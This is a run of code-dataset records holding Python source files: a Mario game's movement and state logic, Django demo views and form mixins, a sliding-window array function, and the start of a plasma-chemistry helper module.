['Move_State', 'Decel_State', 'Brake_State', 'Idle_State']):\n self.start_height = self.pos.y\n\n if self.vel.y == 0:\n if self.pressed_left or self.pressed_right:\n self.action_states.on_event('move')\n\n if ((self.vel.x < 0 and not self.pressed_left) or\n (self.vel.x > 0 and not self.pressed_right)):\n self.action_states.on_event('decel')\n \n if ((self.vel.x < 0 and self.pressed_right) or\n (self.vel.x > 0 and self.pressed_left)):\n self.action_states.on_event('brake')\n\n if abs(self.vel.x) < 0.02 and self.current_action_state != 'Move_State':\n self.vel.x = 0\n self.action_states.on_event('idle')\n\n if all(self.current_action_state != state for state in ['Decel_State', 'Brake_State', 'Crouch_State']):\n s.FRICTION = 1\n\n if any(self.current_action_state == state for state in ['Jump_State', 'No_Jump_State']):\n if self.animation.mario_size == 'Small_Mario':\n self.animation.current_sprite = sprites.SMALL_MARIO_JUMP\n else:\n self.animation.current_sprite = sprites.BIG_MARIO_JUMP\n\n if self.current_mario_state == 'Big_Mario':\n if self.crouch:\n self.action_states.on_event('crouch')\n\n def move(self):\n # X and Y\n if self.vel.x != 0:\n self.move_single_axis(self.vel.x, 0)\n if self.vel.y != 0:\n self.move_single_axis(0, self.vel.y)\n\n def move_single_axis(self, dx, dy):\n # Move left/right and check collision\n self.pos.x += dx * s.var_time\n self.pos.y += dy * s.var_time\n\n self.collider_collisions(dx, dy)\n if self.current_mario_state != 'Invincible_Mario':\n self.check_entity_collisions() \n\n self.check_backtrack()\n\n def check_backtrack(self):\n # Make sure you can't go back\n if self.pos.x < s.camera.pos.x:\n self.pos.x = clamp(self.pos.x, s.camera.pos.x, s.SCREEN_SIZE.x)\n self.vel.x = 0 \n if all(self.current_action_state != state for state in [\"Jump_State\", \"No_Jump_State\"]):\n self.action_states.on_event('idle') \n\n def collider_collisions(self, dx, dy):\n # Collision with brick\n other_collider = self.rect.check_collisions(level.static_colliders + level.dynamic_colliders)\n\n if other_collider is None:\n return\n if dx > 0:\n if self.current_action_state == 'Move_State':\n self.action_states.on_event('idle')\n self.pos.x = other_collider.pos.x - self.rect.w\n self.vel.x = 0\n elif dx < 0:\n if self.current_action_state == 'Move_State':\n self.action_states.on_event('idle')\n self.pos.x = other_collider.pos.x + other_collider.rect.w\n self.vel.x = 0\n elif dy > 0:\n if self.current_action_state == 'No_Jump_State':\n self.action_states.on_event('idle')\n self.pos.y = other_collider.pos.y - self.rect.h\n self.vel.y = 0\n elif dy < 0:\n self.interact_with_brick(other_collider)\n self.action_states.on_event('no jump')\n self.pos.y = other_collider.pos.y + other_collider.rect.h\n self.vel.y = s.BOUNCE_VEL\n\n def check_entity_collisions(self):\n # Collision Check\n entities = self.rect.check_entity_collisions(level.super_mushrooms + level.enemies)\n\n for entity in entities:\n if entity.__class__.__name__ == 'Super_Mushroom' and entity.deployed:\n self.mario_states.on_event('grow')\n entity.collected = True\n\n if hasattr(entity, 'state_machine') and entity.state_machine.get_state() != 'Knocked_State':\n if entity.state_machine.get_state() == 'Shell_State':\n if self.pos.x + self.rect.w < entity.pos.x + entity.rect.w / 2:\n entity.vel.x = 0.5\n elif self.pos.x + self.rect.w > entity.pos.x + entity.rect.w / 2:\n entity.vel.x = -0.5\n elif self.vel.x < 0:\n entity.vel.x = -0.5\n elif self.vel.x > 0:\n entity.vel.x = 0.5\n else:\n entity.vel.x = random.choice([-0.5, 0.5])\n entity.state_machine.on_event('move shell')\n\n elif self.pos.y + self.rect.h - self.vel.y * s.var_time < entity.pos.y:\n if entity.state_machine.get_state() == 'Run_State':\n self.vel.y = s.STOMP_VEL\n self.pos.y = entity.pos.y - self.rect.h\n entity.state_machine.on_event('squish')\n return\n else:\n if entity.state_machine.get_state() != 'Shell_State' and entity.can_kill:\n self.mario_states.on_event('shrink')\n\n def interact_with_brick(self, tile):\n if self.current_mario_state == 'Small_Mario':\n tile.state_machine.on_event('bounce')\n if tile.__class__.__name__ == 'Brick':\n sounds.bump.play()\n elif self.current_mario_state == 'Big_Mario':\n tile.state_machine.on_event('break')\n if tile.__class__.__name__ == 'Question':\n tile.state_machine.on_event('bounce')\n\n class Animation:\n def __init__(self):\n self.current_sprite = sprites.SMALL_MARIO_IDLE\n\n self.mario_size = 'Small_Mario'\n self.anim_frame = 0\n self.anim_timer = s.INITIAL_TIMER_VALUE\n self.invincible_timer = 0\n\n self.start_height = None\n self.new_y = self.start_height\n\n self.grow_frames = [0, 1, 0, 1, 2, 0, 1, 2]\n self.shrink_frames = [0, 1, 0, 1, 2, 1, 2, 1]\n self.run_frames = [0, 1, 2, 1]\n self.start_sprite_height = 0\n\n def reset_anim_vars(self):\n # Reset\n self.anim_frame = 0\n self.anim_timer = s.INITIAL_TIMER_VALUE\n\n def grow_anim(self):\n self.current_sprite = sprites.GROW_SPRITES[self.grow_frames[self.anim_frame]]\n self.anim_timer += s.var_time\n if self.anim_timer > 6 * s.var_time:\n self.anim_frame += 1\n self.anim_timer = 0\n self.new_y = self.start_height - (self.current_sprite[3] - 48)\n\n def run_anim(self):\n if self.mario_size == 'Small_Mario':\n self.current_sprite = sprites.SMALL_MARIO_RUN[self.run_frames[self.anim_frame % 4]]\n else:\n self.current_sprite = sprites.BIG_MARIO_RUN[self.run_frames[self.anim_frame % 4]]\n self.anim_timer += s.var_time\n if self.anim_timer > 6 * s.var_time:\n self.anim_frame += 1\n self.anim_timer = 0\n\n def shrink_anim(self):\n self.current_sprite = sprites.SHRINK_SPRITES[self.shrink_frames[self.anim_frame]]\n self.anim_timer += s.var_time\n if self.anim_timer > 6 * s.var_time:\n self.anim_frame += 1\n self.anim_timer = 0\n self.new_y = self.start_height + (self.start_sprite_height - self.current_sprite[3])\n\n def win_anim_on_flag(self):\n if self.mario_size == 'Small_Mario':\n self.current_sprite = sprites.WIN_SPRITES_SMALL[self.anim_frame % 2]\n else:\n self.current_sprite = sprites.WIN_SPRITES_BIG[self.anim_frame % 2]\n self.anim_timer += s.var_time\n if self.anim_timer > 8 * s.var_time:\n self.anim_frame += 1\n self.anim_timer = 0\n\n class Idle_State(State):\n def on_enter(self, owner_object):\n if owner_object.animation.mario_size == 'Small_Mario':\n owner_object.animation.current_sprite = sprites.SMALL_MARIO_IDLE\n else:\n owner_object.animation.current_sprite = sprites.BIG_MARIO_IDLE\n \n def on_event(self, event):\n if event == 'jump':\n return Mario.Jump_State()\n elif event == 'move':\n return Mario.Move_State()\n elif event == 'decel':\n return Mario.Decel_State()\n elif event == 'brake':\n return Mario.Brake_State()\n elif event == 'crouch':\n return Mario.Crouch_State()\n return self\n\n class Jump_State(State):\n def on_event(self, event):\n if event == 'no jump':\n return Mario.No_Jump_State()\n return self\n\n def on_enter(self, owner_object):\n if owner_object.current_mario_state == 'Small_Mario':\n sounds.small_jump.play()\n else:\n sounds.big_jump.play()\n \n def update(self, owner_object):\n owner_object.vel.y = s.JUMP_VELOCITY\n if (not owner_object.spacebar or \n owner_object.pos.y < owner_object.start_height - s.MAX_JUMP_HEIGHT):\n owner_object.action_states.on_event('no jump')\n \n class No_Jump_State(State):\n def on_event(self, event):\n if event == 'idle':\n return Mario.Idle_State()\n elif event == 'decel':\n return Mario.Decel_State()\n elif event == 'brake':\n return Mario.Brake_State()\n elif event == 'move':\n return Mario.Move_State()\n return self\n\n class Move_State(State):\n def on_event(self, event):\n if event == 'decel':\n return Mario.Decel_State()\n elif event == 'brake':\n return Mario.Brake_State()\n elif event == 'no jump':\n return Mario.No_Jump_State()\n elif event == 'jump':\n return Mario.Jump_State()\n elif event == 'crouch':\n return Mario.Crouch_State()\n elif event == 'idle':\n return Mario.Idle_State()\n return self\n\n def update(self, owner_object):\n if owner_object.pressed_left:\n s.ACCELERATION = -s.MARIO_ACCELERATION\n elif owner_object.pressed_right:\n s.ACCELERATION = s.MARIO_ACCELERATION\n owner_object.animation.run_anim()\n\n class Brake_State(State):\n def on_event(self, event):\n if event == 'move':\n return Mario.Move_State()\n elif event == 'decel':\n return Mario.Decel_State()\n elif event == 'no jump':\n return Mario.No_Jump_State()\n elif event == 'jump':\n return Mario.Jump_State()\n elif event == 'crouch':\n return Mario.Crouch_State()\n elif event == 'idle':\n return Mario.Idle_State()\n return self\n\n def on_enter(self, owner_object):\n s.ACCELERATION = 0\n s.FRICTION = s.BRAKE_FRICTION\n if owner_object.animation.mario_size == 'Small_Mario':\n owner_object.animation.current_sprite = sprites.SMALL_MARIO_BRAKE\n else:\n owner_object.animation.current_sprite = sprites.BIG_MARIO_BRAKE\n\n class Decel_State(State):\n def on_event(self, event):\n if event == 'idle':\n return Mario.Idle_State()\n elif event == 'brake':\n return Mario.Brake_State()\n elif event == 'move':\n return Mario.Move_State()\n elif event == 'no jump':\n return Mario.No_Jump_State()\n elif event == 'jump':\n return Mario.Jump_State()\n elif event == 'crouch':\n return Mario.Crouch_State()\n return self\n\n def on_enter(self, owner_object):\n s.ACCELERATION = 0\n s.FRICTION = s.DECEL_FRICTION\n\n def update(self, owner_object):\n owner_object.animation.run_anim()\n\n class Invincible_Mario(State):\n def __init__(self):\n self.invincible_timer = 0\n self.blink_timer = 0\n\n def on_event(self, event):\n if event == 'small mario':\n return Mario.Small_Mario()\n return self\n\n def update(self, owner_object):\n self.invincible_timer += s.var_time\n if self.invincible_timer > 40 * s.var_time:\n owner_object.mario_states.on_event('small mario')\n\n self.blink_timer += s.var_time\n if self.blink_timer > 7 * s.var_time:\n owner_object.animation.current_sprite = sprites.EMPTY_SPRITE\n if self.blink_timer > 14 * s.var_time:\n self.blink_timer = 0\n\n def on_exit(self, owner_object):\n owner_object.animation.reset_anim_vars()\n\n class Small_Mario(State):\n def on_event(self, event):\n if event == 'grow':\n return Mario.Grow_Mario()\n elif event == 'shrink':\n return Mario.Dead_Mario()\n elif event == 'win':\n return Mario.Win_State()\n elif event == 'dead':\n return Mario.Dead_Mario()\n return self\n \n class Grow_Mario(State):\n def on_event(self, event):\n if event == 'big mario':\n return Mario.Big_Mario()\n if event == 'shrink':\n return Mario.Shrink_Mario()\n return self\n\n def on_enter(self, owner_object):\n owner_object.animation.start_height = owner_object.pos.y\n owner_object.animation.reset_anim_vars()\n owner_object.freeze_movement = True\n\n def update(self, owner_object):\n owner_object.animation.grow_anim()\n owner_object.pos.y = owner_object.animation.new_y\n if owner_object.animation.anim_frame > 7:\n owner_object.mario_states.on_event('big mario')\n\n def on_exit(self, owner_object):\n owner_object.rect.h = 96\n owner_object.animation.mario_size = 'Big_Mario'\n owner_object.animation.reset_anim_vars()\n owner_object.freeze_movement = False\n\n class Big_Mario(State):\n def on_event(self, event):\n if event == 'shrink':\n return Mario.Shrink_Mario()\n elif event == 'dead':\n return Mario.Dead_Mario()\n elif event == 'win':\n return Mario.Win_State()\n return self\n\n class Shrink_Mario(State):\n def on_event(self, event):\n if event == 'invincible':\n return Mario.Invincible_Mario()\n if event == 'grow mario':\n return Mario.Grow_Mario()\n return self\n\n def on_enter(self, owner_object):\n owner_object.animation.reset_anim_vars()\n owner_object.animation.start_height = owner_object.pos.y\n owner_object.animation.start_sprite_height = owner_object.animation.current_sprite[3]\n owner_object.freeze_movement = True\n sounds.pipe.play()\n\n def update(self, owner_object):\n owner_object.animation.shrink_anim()\n owner_object.pos.y = owner_object.animation.new_y\n if owner_object.animation.anim_frame > 7:\n owner_object.mario_states.on_event('invincible')\n\n def on_exit(self, owner_object):\n owner_object.rect.h = 48\n owner_object.animation.mario_size = 'Small_Mario'\n owner_object.animation.reset_anim_vars()\n owner_object.freeze_movement = False\n\n class Crouch_State(State):\n def on_event(self, event):\n if event == 'brake':\n return Mario.Brake_State()\n elif event == 'jump':\n return Mario.Jump_State()\n elif event == 'decel':\n return Mario.Decel_State()\n elif event == 'move':\n return Mario.Move_State()\n elif event == 'idle':\n return Mario.Idle_State()\n return self\n\n def on_enter(self, owner_object):\n s.FRICTION = s.BRAKE_FRICTION\n s.ACCELERATION = 0\n owner_object.animation.current_sprite = sprites.MARIO_CROUCH\n owner_object.pos.y += 30\n owner_object.rect.h = owner_object.animation.current_sprite[3]\n\n def update(self, owner_object):\n s.ACCELERATION = 0\n if owner_object.vel.x == 0:\n if owner_object.pressed_left:\n owner_object.flip_sprites = True\n if owner_object.pressed_right:\n owner_object.flip_sprites = False\n\n def on_exit(self, owner_object):\n owner_object.pos.y -= 31\n owner_object.start_height = owner_object.pos.y\n \n class Dead_Mario(State):\n def __init__(self):\n self.death_timer = 0\n\n def on_event(self, event):\n return self\n\n def on_enter(self, owner_object):\n owner_object.animation.current_sprite = sprites.DEAD_MARIO\n owner_object.vel.y = s.DEATH_VEL_Y\n owner_object.vel.x = 0\n owner_object.freeze_movement = True\n owner_object.freeze_input = True\n pg.mixer.music.stop()\n pg.mixer.music.set_endevent(s.DEATH_SONG_END)\n pg.mixer.music.load(sounds.death)\n pg.mixer.music.play()\n\n def update(self, owner_object):\n self.death_timer += s.var_time\n if self.death_timer > 20 * s.var_time:\n accelerate(owner_object, 0, s.GRAVITY)\n owner_object.pos += owner_object.vel * s.var_time\n\n class Win_State(State):\n def __init__(self):\n self.animation_step = 0\n self.timer = 0\n\n def on_event(self, event):\n return self\n\n def on_enter(self, owner_object):\n owner_object.animation.reset_anim_vars()\n owner_object.animation.start_height = owner_object.pos.y\n owner_object.animation.new_y = owner_object.pos.y\n owner_object.pos.x = s.flagpole.pos.x - 16\n owner_object.freeze_movement = True\n owner_object.freeze_input = True\n owner_object.vel = Vector2()\n pg.mixer.music.stop()\n sounds.flagpole_sound.play()\n\n def update(self, owner_object):\n\n if self.animation_step == 0:\n owner_object.animation.win_anim_on_flag()\n owner_object.pos.y += 4\n if owner_object.pos.y > s.flagpole.pos.y + s.flagpole.rect.h - 100:\n self.animation_step = 1\n\n elif self.animation_step == 1:\n owner_object.pos.x = s.flagpole.pos.x + 24\n owner_object.flip_sprites = True\n self.timer += s.var_time\n if self.timer > 20 * s.var_time:\n owner_object.flip_sprites = False\n owner_object.freeze_movement = False\n owner_object.pos.x = s.flagpole.pos.x + s.flagpole.rect.w\n self.animation_step = 2\n pg.mixer.music.set_endevent(s.WIN_SONG_END)\n pg.mixer.music.load(sounds.stage_clear)\n pg.mixer.music.play()\n\n elif self.animation_step == 2:\n s.ACCELERATION = s.MARIO_ACCELERATION\n owner_object.pressed_right = True\n if owner_object.pos.x > s.LEVEL_END_X:\n owner_object.freeze_movement = True\n s.final_count_down = True\n","sub_path":"data/components/mario.py","file_name":"mario.py","file_ext":"py","file_size_in_byte":23705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"430872072","text":"from django.shortcuts import render\nfrom common.get_data import hubspot_api\nfrom common.db_helper import db_helper\nfrom pprint import pprint\nfrom django.http import HttpResponse,JsonResponse\nfrom common.log import Log\n\n\ndb_controller = db_helper()\n\n# Create your views here.\n# SHOW DATA LIST TABLE\ndef list_table(request):\n # Lấy dữ liệu từ database\n return render(request, 'demoFrontent/table_demo/list_table.html')\n\ndef copy_to_clipboard(request):\n return render(request, 'demoFrontent/page_copy_to_clipboard.html')\n\ndef notification(request):\n return render(request, 'demoFrontent/page_notification.html')\n\ndef select2_single(request):\n return render(request, 'demoFrontent/page_select_2.html')\n\ndef dragable(request):\n list_vid = hubspot_api.get_list_vid_in_list()\n list_info_contact = []\n for vid in list_vid:\n info_contact = hubspot_api.get_info_contact(vid)\n list_info_contact.append(info_contact)\n\n # Lấy list lifecycle stage\n sql_query_list_lifecycle = ''' SELECT * FROM demo.lifecycle_stages; '''\n object_list_lifecycle = db_controller.query(sql_query_list_lifecycle) \n \n data = {\n 'info_contact' : list_info_contact,\n 'list_lifecycle' : object_list_lifecycle\n }\n return render(request, 'demoFrontent/dragable.html', data)\n \ndef spinner(request):\n return render(request, 'demoFrontent/page_spinner.html')\n\ndef chart(request):\n # Lấy list ranking hiển thị người dùng đã setting\n list_show_ranking = \"up11-29,up6-10,up1-5,nochange,down1-5,down6-10,down11-29\"\n split_list_show_ranking = list_show_ranking.split(\",\")\n\n list_label_ranking = []\n for list_show_ranking in split_list_show_ranking:\n if list_show_ranking == \"up100higher\":\n list_label_ranking.append(\"Up 100 or higher\")\n elif list_show_ranking == \"up30-99\":\n list_label_ranking.append(\"Up 30-99\")\n elif list_show_ranking == \"up11-29\":\n list_label_ranking.append(\"Up 11-29\")\n elif list_show_ranking == \"up6-10\":\n list_label_ranking.append(\"Up 6-10\")\n elif list_show_ranking == \"up1-5\":\n list_label_ranking.append(\"Up 1-5\")\n elif list_show_ranking == \"nochange\":\n list_label_ranking.append(\"No change\")\n elif list_show_ranking == \"down1-5\":\n list_label_ranking.append(\"Down 1-5\")\n elif list_show_ranking == \"down6-10\":\n list_label_ranking.append(\"Down 6-10\")\n elif list_show_ranking == \"down11-29\":\n list_label_ranking.append(\"Down 11-29\")\n elif list_show_ranking == \"down100\":\n list_label_ranking.append(\"Down 100 or higher\")\n \n data = {\n 'list_label_ranking' : list_label_ranking\n }\n\n return render(request, 'demoFrontent/chart.html', data)\n\ndef demo(request):\n dict_contact_marketing = {\n 'subsrciber' : {\n 'label' : 'Subsrciber',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu1',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu2',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'lead' : {\n 'label' : 'Lead',\n 'list_contact' : [\n {\n 'vid' : '4',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '5',\n 'company' : 'Makudu1',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '5',\n 'company' : 'Makudu2',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'marketingqualifiedlead' : {\n 'label' : 'MQL',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n }\n ]\n }\n }\n\n dict_contact_sales = {\n 'subsrciber' : {\n 'label' : 'Subsrciber',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu1',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu2',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'lead' : {\n 'label' : 'Lead',\n 'list_contact' : [\n {\n 'vid' : '4',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '5',\n 'company' : 'Makudu1',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '5',\n 'company' : 'Makudu2',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'marketingqualifiedlead' : {\n 'label' : 'MQL',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n }\n ]\n },\n 'whatever1' : {\n 'label' : 'Whatever 1',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'whatever2' : {\n 'label' : 'Whatever 2',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'whatever3' : {\n 'label' : 'Whatever 3',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n },\n 'whatever4' : {\n 'label' : 'Whatever 4',\n 'list_contact' : [\n {\n 'vid' : '1',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '2',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n {\n 'vid' : '3',\n 'company' : 'Makudu',\n 'firstname' : 'Trina',\n 'lastname' : 'Foo2',\n 'closedate' : '2019-02-01'\n },\n ]\n }\n\n }\n\n data = {\n 'dict_contact_marketing' : dict_contact_marketing,\n 'dict_contact_sales' : dict_contact_sales\n }\n return render(request, 'demoFrontent/demo.html', data)\n\ndef demo_sales_setting(request):\n return render(request, 'demoFrontent/demo_sells_setting.html')\n\ndef ajax_get_form_sale_setting(request):\n if request.method == 'POST':\n\n if request.is_ajax():\n try:\n #1)Lấy dữ liệu từ request\n return render(request, 'demoFrontent/data/data_sale_setting.html')\n\n except Exception as inst:\n result = Log().write_log(inst)\n return HttpResponse(result)\n \n return HttpResponse('')\n\n\ndef ajax_refresh_list_Oracle(request):\n body = \"You have a new contact from [Oracle]テリトリー週次\"\n url = 'https://local.leadplus.net/report/contact'\n data = {\n 'body' : body,\n 'url' : url\n }\n return render(request, \"demoFrontent/notification.html\", data)","sub_path":"demoFrontent/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11345,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"149817614","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nfrom django import forms\nfrom thecut.forms.utils import add_css_class\n\n\nclass EmailTypeMixin(object):\n \"\"\"Adds the HTML5 'email' input type to any email fields.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(EmailTypeMixin, self).__init__(*args, **kwargs)\n\n # Set HTML5 input type for email fields\n for field in self.fields.values():\n if isinstance(field, forms.EmailField):\n field.widget.input_type = 'email'\n\n\nclass RequiredMixin(object):\n \"\"\"Adds the HTML5 'required' attribute to any required fields.\"\"\"\n\n required_css_class = 'required'\n\n def __init__(self, *args, **kwargs):\n super(RequiredMixin, self).__init__(*args, **kwargs)\n\n # Set HTML5 required attributes. Note that if we set the required\n # attribute on fields with certain widgets, it will cause the form to\n # break by requiring EVERY option to be selected. This is not possible\n # with the RadioSelect widget, and in most cases won't be the desired\n # behaviour with the CheckboxSelectMultiple widget. If it is, the\n # required attribute of the widget can still be set manually in the\n # form.\n for field in self.fields.values():\n if field.required and not (\n isinstance(field.widget, forms.CheckboxSelectMultiple) or\n isinstance(field.widget, forms.RadioSelect)):\n field.widget.attrs.update({'required': 'required'})\n\n\nclass MaxLengthMixin(object):\n \"\"\"Adds the HTML5 'maxlength' attribute to applicable Textarea widgets.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(MaxLengthMixin, self).__init__(*args, **kwargs)\n\n # HTML5 maxlength attribute for textarea\n for field in self.fields.values():\n if isinstance(field.widget, forms.Textarea) and field.max_length:\n field.widget.attrs.update({'maxlength': field.max_length})\n\n\nclass PlaceholderMixin(object):\n\n class Meta(object):\n placeholders = {}\n\n def __init__(self, *args, **kwargs):\n super(PlaceholderMixin, self).__init__(*args, **kwargs)\n for key, value in self.Meta.placeholders:\n self.fields[key].widget.attrs.update({'placeholder': value})\n\n\nclass TimeClassMixin(object):\n \"\"\"Adds a 'time' css class to any time fields.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(TimeClassMixin, self).__init__(*args, **kwargs)\n\n # HTML5 input types and attributes\n for field in self.fields.values():\n if isinstance(field.widget, forms.TimeInput):\n add_css_class(field.widget, 'time')\n\n\nclass DateClassMixin(object):\n \"\"\"Adds a 'date' css class to any date fields.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(DateClassMixin, self).__init__(*args, **kwargs)\n\n # HTML5 input types and attributes\n for field in self.fields.values():\n if isinstance(field.widget, forms.DateInput):\n add_css_class(field.widget, 'date')\n\n\nclass DateTimeClassMixin(object):\n \"\"\"Adds a 'datetime' css class to any datetime fields.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(DateTimeClassMixin, self).__init__(*args, **kwargs)\n\n # HTML5 input types and attributes\n for field in self.fields.values():\n if isinstance(field.widget, forms.DateTimeInput):\n add_css_class(field.widget, 'datetime')\n\n\nclass DateTimeTimezoneMixin(object):\n \"\"\"Adds timezone help text to any datetime fields.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(DateTimeTimezoneMixin, self).__init__(*args, **kwargs)\n self._set_timezone_help_texts(data=self.initial)\n\n def _set_timezone_help_texts(self, data):\n for field_name, field in self.fields.items():\n field_data = data.get(field_name)\n if field_data and isinstance(field.widget, forms.DateTimeInput):\n field.help_text = field_data.tzname()\n\n def clean(self, *args, **kwargs):\n cleaned_data = super(DateTimeTimezoneMixin, self).clean(*args,\n **kwargs)\n self._set_timezone_help_texts(data=cleaned_data)\n return cleaned_data\n\n\nclass FormMixin(DateTimeClassMixin, DateClassMixin, EmailTypeMixin,\n MaxLengthMixin, PlaceholderMixin, RequiredMixin,\n TimeClassMixin):\n \"\"\"Form mixin.\n\n Used to extend a standard Django :py:class:`~django.forms.Form` class with\n useful/common behaviour.\n\n \"\"\"\n\n error_css_class = 'error'\n label_suffix = ''\n","sub_path":"thecut/forms/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"283453231","text":"#Function to find first negative integer in a particular window\ndef printFirstNegativeInteger(arr, n, k):\n\n #Loop for each subarray\n for i in range(0, (n - k + 1)):\n flag = False\n\n #Traverse through current window\n for j in range(0, k):\n # If a negative integer is found, then \n # it is the first negative integer for \n # current window. Print it, set the flag \n # and break \n if(arr[i + j] < 0):\n print(arr[i + j],end = \" \")\n flag = True\n break\n\n # If the current window does not \n # contain a negative integer \n if (not(flag)): \n print(\"0\", end = \" \") \n \n# Driver Code \narr = [12, -1, -7, 8, -15, 30, 16, 28] \nn = len(arr) \nk = 3\nprintFirstNegativeInteger(arr, n, k) \n \n\n","sub_path":"firstnegativeinteger.py","file_name":"firstnegativeinteger.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"532792356","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 14:47 2017/7/5\n\n@author: Liu Jinbao\n@mail: liu.jinbao@outlook.com\n@project: PlasmaChemistry\n@IDE: PyCharm\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nimport re\nfrom math import log\nfrom .. import constants as const\nfrom .read_data import species_thermal_data, molecular_const\n\n\n# ----------------------------------------------------------------------------------------------- #\nclass MoleculeError(Exception):\n \"\"\"pass\"\"\"\n pass\n\n\n# ----------------------------------------------------------------------------------------------- #\ndef get_ideal_gas_density(*, p_Pa, Tgas_K):\n \"\"\"\n Calculate the gas density based on the ideal gas law.\n\n Parameters\n ----------\n p_Pa : float\n Pressure in Pa.\n Tgas_K : float\n Temperature of gas in Kelvin.\n\n Returns\n -------\n density : float\n Gas number density in unit of m^-3\n\n Examples\n --------\n >>> from plasmistry.molecule import get_ideal_gas_density\n >>> from plasmistry import constants as const\n >>> get_ideal_gas_density(p_Pa=const.pressure_STP,Tgas_K=const.temperature_STP)\n 2.6516467463592656e+25\n >>> get_ideal_gas_density(p_Pa=const.pressure_NTP,Tgas_K=const.temperature_NTP)\n 2.5034768825147869e+25\n\n \"\"\"\n assert isinstance(p_Pa, float) or isinstance(p_Pa, int)\n assert isinstance(Tgas_K, float) or isinstance(Tgas_K, int)\n assert p_Pa > 0\n assert Tgas_K > 0\n return p_Pa / const.R / Tgas_K * const.N_A\n\n\ndef get_reaction_enthalpy(*, reaction, particle_enthalpy):\n \"\"\"\n Calculate reaction enthalpy based on enthalpy_dict.\n\n Parameters\n ----------\n reaction : str\n Reaction string like 'A + B => C + D'\n particle_enthalpy : dict\n {particle[string] : enthalpy[float]}\n\n Returns\n -------\n reaction_enthalpy : float\n Reaction enthalpy in unit same with particle_enthalpy value\n\n \"\"\"\n assert isinstance(reaction, str)\n assert 